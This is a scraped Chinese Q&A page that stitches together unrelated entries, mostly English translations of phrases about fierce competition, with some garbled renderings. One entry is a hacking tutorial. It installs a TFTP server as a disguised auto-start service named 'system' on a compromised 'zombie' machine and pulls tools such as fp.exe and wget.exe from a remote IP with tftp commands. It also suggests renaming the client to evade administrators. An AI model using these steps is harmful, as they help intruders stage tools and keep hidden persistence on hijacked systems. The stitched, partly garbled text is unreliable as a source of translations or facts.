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2023-08-22 20:01:39
TAG: 英文 姐姐

昨天你姐姐怎么了英文为:How was your older sister yesterday?或What happened to your older sister yesterday?

这句话的意思是询问对方的姐姐是否发生了什么事情。其中,“how”这个词在这里表示“怎样”,可以用来询问某人的状态或情况。而“what happened”则表示“发生了什么事情”,用来询问某个事件或事故的经过。

“How”通常用于询问某个事物的状态、情况、程度、方式等。例如:How are you feeling today?(你今天感觉怎么样?);How was your day at work?(你今天上班过得怎么样?)“What”通常用于询问某个事物的名称、性质、特征等。例如:What"s your favorite color?(你最喜欢什么颜色?)








竞争激烈 [词典] the dust and heat of the day; fierce competition; [例句]日 实行竞争激烈的市场体制。Japan is a highly competitive market system
2023-08-14 10:26:502

竞争激烈 英文怎么说

The competition is fierce
2023-08-14 10:27:193

竞争很激烈 用英语翻译

竞争很激烈 Competition is intense
2023-08-14 10:27:301


现代社会的每个人都面临着激烈的竞争.Everyone in modern society faces the keen competition.社会竞争:social competition竞争激烈的竞争激烈.Competition is very keen.由于失业如此众...
2023-08-14 10:27:491


激烈的就业竞争的英文是:Fierce competition for employment。在英语中,fierce是形容词,意为凶猛的、猛烈的;competition是名词,意为竞争、角逐、比赛;employment是名词,意为工作、职业;for是介词。英语是一种西日耳曼语支,最早被中世纪的英国使用,并因其广阔的殖民地而成为世界使用面积最广的语言。
2023-08-14 10:27:571


Facing the drastic competition
2023-08-14 10:28:262


The competition for occupation is fierce.The competition for job is fierce.
2023-08-14 10:28:351


怎样用英语翻译”当今的社会竞争越来越激烈,人们对选 当今的社会竞争越来越激烈,人们对选 Today"s increasingly petitive society, people to choose “当今的社会竞争越来越激烈,人们对选择理想的职业的要求也越来越高”怎么用英语翻译啊? Now people pete more and more severely and their demand for choosing ideal oupation is growing higher. 急!急!急!怎样用英语翻译”当今的社会竞争越来越激烈,人们对选择理想的职业的要求也越来越高”谢谢了 nowadays, the petitions are being harder and harder and the standards of jobs are higher and higher and higher. 教师职业竞争越来越激烈 英语翻译,线上等 The professional petition beeen teachers bees fiercer than before 越来越激烈的用英语怎么翻译 越来越激烈 More and more intense 怎样教孩子面对越来越激烈的社会竞争 如果把你比作一艘大海中的帆船,那你首先,要确立你的目的地——确定你自己人生的意义。其次,你要选择航行路线——树立自己的目标(、中期和短期目标)。再次,你要掌好舵——有了目标就一定要坚持。最后,你要随时调整帆向——外部环境不停变化,你不但要随时修正自己的计划,还要不断从外界吸取新鲜知识,学习新的能力。 你说要篇论文吧? “在竞争激烈的社会中,人们越来越习惯撒谎”用英语怎么翻译? People are getting more and more used to lying in this severe-peting society. 随着社会发展,竞争越来越激烈英文怎么说 As society develops,the petition will be fiercer and fiercer. 随着社会发展,竞争越来越激烈 With the development of society, the increasing petition 现在,找工作的竞争越来越激烈了用英语怎摸说 Now, looking more and more intense petition for jobs
2023-08-14 10:28:461


with the fierce competition in nowadays
2023-08-14 10:28:544


Given to the much fiercer competition, ……
2023-08-14 10:29:065


This battle is fight at close quarters but really fierce
2023-08-14 10:29:241


There is a fierce competition in the home market of vendition.
2023-08-14 10:29:453


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2023-08-14 10:30:183


翻译成英文是:Competition in all industries is becoming increasingly fierce
2023-08-14 10:30:261


2023-08-14 10:30:433

因为在中国这样竞争激烈的社会里 只有好成绩才能保证前途光明英文怎么说

英文: Because in such a competitive society in China, only good results to ensure a bright future. 德文: Denn in China, das den Wettbewerb der Gesellschaft nur Gut um die vielversprechende Ergebnisse 俄罗斯语: Потому что в китае в такой жесткой конкуренции только хорошие результаты в обществе может гарантировать светлое будущее ----------------------------------------希望可以帮到你
2023-08-14 10:31:001


面临更加激烈的国际竞争Face more intense international competition、面临更加激烈的国际竞争Face more intense international competition
2023-08-14 10:31:101


cruel competitionhave a fine brain
2023-08-14 10:31:327

英语翻译:1广告业是一个竞争激烈的行业。 2大学对好学生争夺十分激烈。 3我对这一行业了解是有限的

1、Advertising industry is filled with competition2、The colleges are disputing for outstanding student3、I am restricted to this industry4、Dishes are available to your door5、It takes me forty-five minutes to go to work6、Shanghai is one of the most populous areas in China7、The patient feels comfortable after operation
2023-08-14 10:31:554


有竞争性的英语是Competitive,是一个常见的英语单词,有多种用法,以下是几个常见的用法:1. 形容词用法:competitive作为形容词,用来形容具有竞争力的人、团队、产品等。例如:"She is a competitive athlete."(她是一个有竞争力的运动员。)"We need to develop competitive strategies to stay ahead of the competition."(我们需要制定有竞争力的策略,以保持领先地位。)2. 副词用法:competitive作为副词,用来描述某事是以竞争的方式进行的。例如:"They played competitively in the basketball game."(他们在篮球比赛中竞争激烈。)3. 名词用法:competitive也可用作名词,表示参与竞争的人或团队。例如:"There are many competitors in the market, and we need to stay ahead of the competition."(市场上有很多竞争对手,我们需要在竞争中保持领先地位。)4. 动词用法:competitive作为动词,意味着参与竞争。例如:"She loves to compete and is always looking for opportunities to be competitive."(她喜欢竞争,总是在寻找有竞争力的机会。)此外,competitive还有一些常见的相关词语和短语,例如competitive advantage(竞争优势),competitive market(竞争市场),competitive salary(有竞争力的薪水),stay competitive(保持竞争力)等等。总的来说,competitive是一个多功能的词汇,可以用来形容竞争激烈的环境、具有竞争力的个人或团体、参与竞争的行为等。熟练掌握和灵活运用competitive的不同用法,对于英语交流和理解都是很有帮助的。
2023-08-14 10:32:031


2023-08-14 10:32:344


2023-08-14 10:32:442

职业竞争激烈 英文怎么说?

the competition for imployment is serious
2023-08-14 10:34:243


A highly competitive society facing us
2023-08-14 10:34:332


cTo read without reflecting is like eating without digesting.
2023-08-14 10:34:446


竞争的名词英文competition; competition:n.竞争;角逐;比赛;竞赛;竞争者 扩展资料   The competition is open to young people under the age of 18.   这项比赛让18岁以下的青少年参加。   We won the contract in the face of stiff competition.   面对激烈的竞争,我们赢得了这项合同。   She won first prize in the competition.   她在竞赛中获得头奖。
2023-08-14 10:35:091


竞争的名词英文单词competition; competition:n.竞争;角逐;比赛;竞赛 扩展资料   The competition is open to young people under the age of 18.   这项比赛让18岁以下的青少年参加。   We won the contract in the face of stiff competition.   面对激烈的竞争,我们赢得了这项合同。   She won first prize in the competition.   她在竞赛中获得头奖。
2023-08-14 10:35:371


竞争的名词英文翻译是competition。 competition作名词时意为“竞争;比赛,竞赛”。 复数:competitions 扩展资料   The competition is open to young people under the age of 18.   这项比赛让18岁以下的青少年参加。   We won the contract in the face of stiff competition.   面对激烈的竞争,我们赢得了这项合同。   She won first prize in the competition.   她在竞赛中获得头奖。
2023-08-14 10:35:501

竞争的名词英文 英文翻译

竞争的名词英文competition; competition:n.竞争;角逐;比赛;竞赛;竞争者 扩展资料   The competition is open to young people under the age of 18.   这项比赛让18岁以下的"青少年参加。   We won the contract in the face of stiff competition.   面对激烈的竞争,我们赢得了这项合同。   She won first prize in the competition.   她在竞赛中获得头奖。
2023-08-14 10:36:031


比赛的英语是competition。一、短语搭配:1、market competition:市场竞争。2、fierce competition:激烈的竞争。3、intense competition:激烈的竞争。4、fair competition:公平竞争。5、price competition:价格竞争。6、keen competition:剧烈竞争。7、design competition:设计大赛。二、近义词辨析:competition,contest,match,这些名词均有“比赛,竞争”之意。competition多指体育运动中的各项比赛、角逐,也指知识、技巧等方面的竞赛;contest多指在音乐、书法、演讲等方面所进行的比赛或竞争;match通常指体育运动项目的比赛,隐含势均力敌意味。词形变化:过去式:competed,eg:They competed against each other in business.(他们是生意场上的对手。)过去分词:competed,eg:Liu had competed in the biennial indoor athletics tournament for three times.(刘翔已经三次参加两年一届的室内田径锦标赛。)现在分词:competing,eg:Several companies are competing for the contract. (为得到那项合同,几家公司正在竞争。)动词:compete,eg:He"s hoping to compete in the London marathon. (他期盼着参加伦敦马拉松比赛。)competition例句:1、He wants to take part in the competition by himself.他想独自参加比赛。2、Furniture-makers in Italy grapple with growing competition from China.来自中国的竞争日益强大,意大利家俱制造商奋力抗争。3、He was in competition with 10 others, so he did well to win the race.他与十个人竞争,所以他确实跑得不错,才赢得了这场赛跑。4、The price competition studies is one of pricing influence factors.价格竞争是研究定价的影响因素之一。5、She was barred from (entering) the competition because of her age她因年龄的关系而被禁止(参加)比赛。6、Her singing during the final round of the competition was rather flat.她在最后一轮比赛中用的降调演唱。7、The prize for the winner of the competition is a two-week holiday in Paris.比赛获胜者的奖品是在巴黎度过为期两周的假期。8、The TV was playing the track and field competition of the Olympic Games.电视机前展示的是奥运会田径赛场。
2023-08-14 10:36:151

请教英语翻译!多谢:在激烈的市场竞争中 怎麼翻?

in the competitive marketin the heated competitionwith so many competitors in the same market
2023-08-14 10:36:472


争夺的英文是fight for。一、读音fight for的英语读音是[fau026at fu0254u02d0(r)]。二、例句1、Graduates have to fight for jobs in a highly competitive market.毕业生不得不在竞争激烈的市场上奋力争取找到工作。2、In the fight for Lemburg,the Austrians were defeated.在争夺伦贝格的战斗中,奥地利人战败了。3、I hope they continue to fight for equal justice after I"m gone.我希望我走了以后他们能继续为司法公正而战。4、We are prepared to fight for every inch of territory.我们时刻准备着为每一寸领土而战。5、We"re expected to hustle and fight for what we want.我们应该为得到自己想要的而不择手段,奋力争取。
2023-08-14 10:37:071


在当前激烈的市场竞争环境下,如何提升企业的英语翻译是:Under the current fierce market competition environment, how to enhance enterprises
2023-08-14 10:37:281

求大神用英文翻译这段话 随着我国的经济的迅猛发展,企业间的竞争也变的日趋激烈,各个企业如果不处理

给的财富值太少, 吃力不讨好
2023-08-14 10:37:455


2023-08-14 10:38:041


Tough competition
2023-08-14 10:38:135


恭喜! 我们很高兴地宣布,你已经提出到梨花女子大学录取。 令我们遗憾,但是,我们有责任告诉你,你没有被赋予了在EGPP或IES奖学金的地位。请理解,这一决定是困难的审议后,由于高竞争使。虽然它可能不容易,我们希望你会发现个人或私人支持入读梨花这里。 如果有任何问题或代表阁下输入,请随时与我们联系。 1。誓章信(附后) 请签署宣誓书封闭的信,并将其发送到Admissionsvia传真(82-2-364-0208)或电子邮件(由7月6日(星期三),2011处。 2。签证文件 你的录取通知书及入学证书(ud45cuc900uc785ud559ud5c8uac00uc11c)关于你的签证将发送由7月29日(星期五),2011出来。 3。文件 所有文件必须提交给招生办公室,由7月6日(星期三),2011。如果有任何的差异排序是在提交的文件或应用程序发现,你的入场将被立即取消。 所需文件:请参阅后的个人邮件。 4。出席事宜 入院后接受,请按照有关登记附件指定的指令。 如果您有任何关于签证的地位等问题等等,请不要犹豫与我们联系。
2023-08-14 10:38:312

求翻译成流畅型英文: 【随着旅游业的崛起,我国旅游发展呈蓬勃趋势,同时旅游空间竞争也越来越激烈,

随着旅游业的崛起,我国旅游发展呈蓬勃趋势,同时旅游空间竞争也越来越激烈,由于各地经济发展水平的差异,旅游发展非均衡化现象日益明显。经济基础好,旅游资源品位高的地区率先获得发展生机,成为知名度广的强势旅游地,而相反情形之下便成为了弱势旅游地。本文主要从对弱势旅游地的概念理解出发,从地理环境、交通、市场等多角度出发对莒县处于弱势地位的原因以及目前存在的问题进行了深入分析,同时结合了人文理念,生态理念,发展理念,对提高莒县竞争力提出了合理化建议,为促进莒县旅游发展提供了借鉴With the rise of tourism, the tourism development of our country is booming trend, tourism space is becoming more and more fierce competition at the same time, due to the differences of the level of economic development in various regions, tourism development equalization phenomenon has become increasingly apparent. Good economic foundation, high grade areas take the lead in tourism resources development vitality, become a wide popularity the strength of the tourist destination, and the opposite situation became weak tourist destination. This article mainly embarks from the understanding of the concept of weak destinations, from multifa ceted aspects of geographical environment, transportation, market, and the reason for the j in a weak position, we deeply analyzed the present problems, and combining the humanistic philosophy, ecological philosophy, development ideas, to enhance the competitiveness of j proposed the rationalization proposal, to promote the development of the j tourism provides the reference
2023-08-14 10:38:411


2023-08-14 10:39:413


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2023-08-14 10:40:117


2023-08-14 10:42:373


2023-08-14 10:42:531


PPV是年度大赛。RAW和SD(SmackDown )是WWE的主打品牌。RAW是WWE联盟每周一的节目,北京时间在周二上午举行。SD现在是WWE联盟每周五的节目,SD节目是提前录制的。NXT是WWE中培养新人的节目。SS是Superstars(不怎么好看)。TNA是仅次于WWE的美国第二大摔角联盟,比赛有每周四举行的Impact和每月一场PPV。iMPACT是TNA的除了PPV的节目。ECW全称Extreme Championship Wrestling 。2003 年,WWE(F)完全收购了ECW,2010年2月23日,WWE的老板Vince McMahon沉重宣布,ECW停播。(求加分哈!)
2023-08-14 10:43:394


“Not sparing any effort”是一个常见的英语习语,意为全力以赴,投入最大的努力和奉献去实现特定的目标或任务。它传达了一种决心、坚持不懈和愿意超越期望以实现目标的意愿。努力学习当有人说他们“不遗余力”时,意味着他们完全致力于自己的目标,愿意投入所有的时间、精力和资源来实现它。这个短语通常用于情况下,例如竞争激烈的就业市场或具有挑战性的学术计划。不遗余力的概念与努力工作和追求卓越的想法密切相关。它暗示了强烈的职业道德,愿意接受挑战和决心在面临挫折或障碍时取得成功。在实践中,不遗余力可以采取许多形式。它可能涉及长时间工作、投资额外的培训或教育、寻求专家的指导或引导,或者冒险尝试以实现期望的结果。无论采取何种方法,关键是保持专注、动力和致力于手头的任务。最终,不遗余力是一种思维方式,可以应用于生活的各个方面,从个人关系到职业追求。它需要强烈的目的感、清晰的目标和优先事项的理解,以及愿意超越自己认为的极限,以实现成功的意愿。坚持不懈总之,“不遗余力”是英语中的一个重要概念,强调了通过努力工作、奉献和坚持不懈实现目标的价值。它是一种思维方式,鼓励个人投入时间、精力和资源到特定的事业中,超越期望并取得成功。通过体现不遗余力的原则,个人可以培养强烈的职业道德,建立韧性,并实现他们期望的结果。
2023-08-14 10:44:151

请英语高手来帮忙翻一下~~中译英 谢谢

First of all, I"ve been fortunate to receive Zoni Language Center of the admission notice, but also very nervous, after all, everything is ready owed to the east - the only hope to smooth the passage of F1 visa. I work in travel agencies, engaged in overseas tourism, since joining the WTO, China"s tourism industry is also related to the rapid opening to the outside world. Exchanges with the outside of the business has become more closely together, often will inevitably come into contact with the English message. Telephone and related materials, especially outside of the invitations and confirmation are all in English, because my English is limited, often do not know how to listen do not understand and do not talk to the normal situation, which greatly affected the work I do The quality and progress of career advancement opportunities, this is a pity! Therefore, I would like to learn English is really, to improve their standard of spoken language, so I can have a better chance in the future work of the exhibition hands and feet, I believe After further studies in their own work can be very useful. Zoni Language Center which is a specialized language training institutions, so that I can learn the correct English, so that I can more easily and fluent in English and understand that good. Through the local cultural environment and school instructors to teach the correct pronunciation skills, I start with English sounds more fluid. Improve my grammar, reading comprehension, listening, writing and taking notes skills, and let me work in the face of English-speaking peers to be more self-confidence, for me, from my career goal into a step forward. Second, because China is now the rapid development of tourism economy, especially in the 2008 Olympics and the 2010 World Expo in Shanghai will be the convening of…… China"s tourism development of space-growing Furthermore, in the present highly competitive society, There are many travel agents will reuse and enabling a better standard of English talent. And I believe that the United States has the high standard of education system, the United States to study language is absolutely is a clear choice. While studying abroad for the sole purpose is to improve their standard of English, develop knowledge, the development of a better future. Finally, thank you very much to spend your valuable time I look at the written request, I hope you will agree that studying abroad for giving me this opportunity, I will study well in school. After returning home for my career promotion to another new peak, a better future for themselves on the painting of a gorgeous!回答者: DLAMSNB - 见习魔法师 二级 5-5 18:18First of all, I"ve been fortunate to receive Zoni Language Center of the admission notice, but also very nervous, after all, everything is ready owed to the east - the only hope to smooth the passage of F1 visa. I work in travel agencies, engaged in overseas tourism, since joining the WTO, China"s tourism industry is also related to the rapid opening to the outside world. Exchanges with the outside of the business has become more closely together, often will inevitably come into contact with the English message. Telephone and related materials, especially outside of the invitations and confirmation are all in English, because my English is limited, often do not know how to listen do not understand and do not talk to the normal situation, which greatly affected the work I do The quality and progress of career advancement opportunities, this is a pity! Therefore, I would like to learn English is really, to improve their standard of spoken language, so I can have a better chance in the future work of the exhibition hands and feet, I believe After further studies in their own work can be very useful. Zoni Language Center which is a specialized language training institutions, so that I can learn the correct English, so that I can more easily and fluent in English and understand that good. Through the local cultural environment and school instructors to teach the correct pronunciation skills, I start with English sounds more fluid. Improve my grammar, reading comprehension, listening, writing and taking notes skills, and let me work in the face of English-speaking peers to be more self-confidence, for me, from my career goal into a step forward. Second, because China is now the rapid development of tourism economy, especially in the 2008 Olympics and the 2010 World Expo in Shanghai will be the convening of…… China"s tourism development of space-growing Furthermore, in the present highly competitive society, There are many travel agents will reuse and enabling a better standard of English talent. And I believe that the United States has the high standard of education system, the United States to study language is absolutely is a clear choice. While studying abroad for the sole purpose is to improve their standard of English, develop knowledge, the development of a better future. Finally, thank you very much to spend your valuable time I look at the written request, I hope you will agree that studying abroad for giving me this opportunity, I will study well in school. After returning home for my career promotion to another new peak, a better future for themselves on the painting of a gorgeous! 就这……
2023-08-14 10:44:404


TFTP(Trivial File Transfer Protocol,简单文件传输协议)是TCP/IP协议族中的一个用来在客户机与服务器之间进行简单文件传输的协议,提供不复杂、开销不大的文件传输服务。TFTP承载在UDP上,提供不可靠的数据流传输服务,不提供存取授权与认证机制,使用超时重传方式来保证数据的到达。与FTP相比,TFTP的大小要小的多。现在最普遍使用的是第二版TFTP(TFTP Version 2,RFC1350).使用UDP 67端口!下面是fport.exe的结果2000 tftpd -> 69 UDP c:winntsystem32 ftpd.exe2. 寻找tftp程序C:WINNTsystem32>dir %windir% ftp* /sdir %windir% ftp* /s //表示在%windir%目录所有子目录搜索tftp前缀程序驱动器 C 中的卷没有标签。卷的序列号是 D428-6BB5C:WINNTsystem32 的目录2000-01-10 12:00 17,168 tftp.exe //客户端 微软自带2000-01-09 00:00 11,264 tftpd.exe //服务端 server版本以上才有2 个文件 28,432 字节 pro没有C:WINNTsystem32dllcache 的目录2000-01-10 12:00 17,168 tftp.exe1 个文件 17,168 字节3. 安装为服务需要instsrv.exe程序a.安装C:WINNTsystem32>instsrv system %windir%system32 ftpd.exeinstsrv system %windir%system32 ftpd.exeThe service was successfuly added!Make sure that you go into the Control Panel and usethe Services applet to change the Account Name andPassword that this newly installed service will useb.查询C:WINNTsystem32>sc qc systemsc qc system[SC] GetServiceConfig SUCCESSSERVICE_NAME: systemTYPE : 10 WIN32_OWN_PROCESSSTART_TYPE : 2 AUTO_STARTERROR_CONTROL : 1 NORMALBINARY_PATH_NAME : C:WINNTsystem32 ftpd.exeLOAD_ORDER_GROUP :TAG : 0DISPLAY_NAME : systemDEPENDENCIES :SERVICE_START_NAME : LocalSystemc.启动C:WINNTsystem32>net start systemnet start systemsystem 服务正在启动 .system 服务已经启动成功。C:WINNTsystem32>sc query systemsc query systemSERVICE_NAME: systemTYPE : 10 WIN32_OWN_PROCESSSTATE : 4 RUNNING(STOPPABLE,PAUSABLE,ACCEPTS_SHUTDOWN)WIN32_EXIT_CODE : 0 (0x0)SERVICE_EXIT_CODE : 0 (0x0)CHECKPOINT : 0x0WAIT_HINT : 0x0d.查看端口是否开放!C:WINNTsystem32>fp |find "tftp"fp |find "tftp"2000 tftpd -> 69 UDP c:winntsystem32 ftpd.exeC:WINNTsystem32>netstat -an |find "69"netstat -an |find "69"UDP *:*UDP 218.11.x.67:69 *:*e.默认文件名称当前驱动器的根目录C:WINNTsystem32>dir %windir%.. ftp* /ad //看见了吗?dir %windir%.. ftp* /ad驱动器 C 中的卷没有标签。卷的序列号是 D428-6BB5C: 的目录2002-12-19 09:27 tftpdroot0 个文件 0 字节1 个目录 3,560,779,776 可用字节C:WINNTsystem32>dir %windir%.. ftpdrootdir %windir%.. ftpdroot驱动器 C 中的卷没有标签。卷的序列号是 D428-6BB5C: ftpdroot 的目录2002-12-19 09:27 .2002-12-19 09:27 ..2002-11-30 14:12 941 slimftpd.conf2002-10-22 11:00 1,642 settings.ini2001-05-04 13:58 52,736 fp.exef.使用客户端程序因为put就是默认到服务器的这个目录。 上传get就是到当前运行的目录里面 下载C:WINNTsystem32>tftp -i 218.11.x.67 get fp.exetftp -i get fp.exeTransfer successful: 52736 bytes in 1 second, 52736 bytes/s对于小于500K的程序用这个上传下载,还不错哦。因为telnet肉鸡。win2000基本上都有tftp.exe 或者自己修改名称隐藏一个呀。有的管理员要删除的哟!!C:WINNTsystem32>tftp -i 218.11.x.67 put fp.exetftp -i put fp.exeTransfer successful: 52736 bytes in 1 second, 52736 bytes/s//上面是上传到服务器。4. 问题因为目录是固定的。所以很容易被发现。只要找弱一点的机器开tftp服务了。还有一个tftpd32.exe 是gui界面的 win98也可以自己开服务器的。压缩后23K我一般就是上传wget.exe这样方便。还有就是C:WINNTsystem32>tftp -i 218.11.x.67 get fp.exetftp -i get fp.exetftp: can t write to local file fp.exe 一般就是本地没有写文件权限 (echo a >b) &(type b) 这样测试权限或者本地存在同名只读属性的文件。需要更新的话。请删除本地文件
2023-08-14 10:39:041


法国签证所需要准备的东西如下一、个人资料表必备材料1.下载并用A4纸打印在1张纸上;签证申请表2.用黑色水笔手写填写,无需粘贴照片;3.本人在签名栏处用黑色水笔中文签名(与护照签名一致)。二、中国大陆因私护照必备材料1.行程结束后至少还有6个月有效期;2.至少留有2页空白签证页,不含备注页;3.护照请正楷签名(不能用铅笔);4.不接收6个月内有欧洲国家拒签记录的护照;5.有旧护照的请提供,若是丢失,请给出原因(备注在个人资料表上)。三、照片必备材料1.4张相同的2寸(3.5cm×4.5cm)白底彩色近照(半年内的);2.露出眉毛,耳朵,即五官要清楚(但是不能露出牙齿);3.不能佩戴任何首饰;4.照片背面用铅笔写上自己的姓名,不要在脸上留下痕迹;5.尽量不佩戴眼镜(若特殊情况需要佩戴眼镜,则不接受黑框或明显颜色框架眼镜,请注意,眼镜不能反光,并且眼镜框不能遮住眼皮)。四、身份证复印件必备材料身份证清晰复印件,须复印正反两面(若身份证丢失,可提供有限期内的临时身份证)五、户口薄复印件必备材料1.整本复印件;2.如是集体户口,可以提供集体户口页复印件加盖户籍章或户籍证明原件加盖户籍章。六、结婚证必备材料1.如已婚,提供结婚证复印件;2.如离婚,提供离婚证复印件;3.未婚或丧偶,此项无需提供。七、在职证明必备材料中文在职证明原件:1.需要说明入职时间,职位,月/年薪情况,并说明放假时间;2.使用公司抬头信纸打印,包括公司名称、地址、电话和传真;2.需盖公章;3.领导亲笔签名(同行人不可相互签名,法人可以是人事签名);4.注意:鲜章应与营业执照公司上的名字一致。八、单位证明复印件必备材料申请人所在单位的《营业执照副本》或《组织机构代码证》复印件,并盖章(二选一);(企业单位盖公章,学校盖党支部章,公安机关盖政治处章)。九、银行流水清单必备材料1.至少提供半年以上的个人银行储蓄卡流水,流水截止日期到提交资料当月,最好是截止到提交一周内,余额在三万人民币以上,不接受信用卡,尽量体现稳定流水,不要突然转入大量金额(建议提供工资卡流水,但不强制)。十、资产证明可选材料1.个人或者夫妻名下的房产证复印件或购房合同复印件及购房发票复印件;2.本人或者夫妻名下带有效年检章的车辆行驶证复印件;3.有条件者提供5万以上的定期存款证明,至少定存三个月,且解冻在本次回国之后(这个不是必须资料,如果提供更有利于签证)。十 一、出境医疗保险单必备材料保险合同应覆盖整个申根区域的行程天数(从离开中国至抵达中国),申根国家签证要求办理签证时购买最低保额为3万欧元(约30万人民币);特别提醒:1.未成年出生医学公证认证(双方父母随行);委托公证认证+出生医学公证认证(双方父母不随行或只有一方随行);不能做亲属关系公证书 如未成年人一方带小孩子去需要提供父母双方的在职证明;2.已婚无业:必须做结婚公证认证;3.特殊人群公证认证及特殊情况需跟签证中心确认;4.涉及到需要邀请函、接待证明的,均需要原件;5.集体户口需要户籍证明、常住人口登记卡均需 盖鲜章;7.申请日期不得早于出发前3个月,不得晚于出发 前5天;8.保险必须比在申根区停留的时间多买一天;9.5人以上需要打电话预约;10.可以申请三年五年,但是一般需要资料好,且有多次出境记录,且最好是在当地有亲戚或者资产,要买够相应保险;11.法国签证比较容易过,但是使馆会打电话抽查,法国签证中心受理时间周一至周五08:00分-17:00分均可送签录指纹 。
2023-08-14 10:39:042

卖东西有很多款式~ 款式1,款式2 等等 用英文怎么写?Style 1 吗?

2023-08-14 10:39:003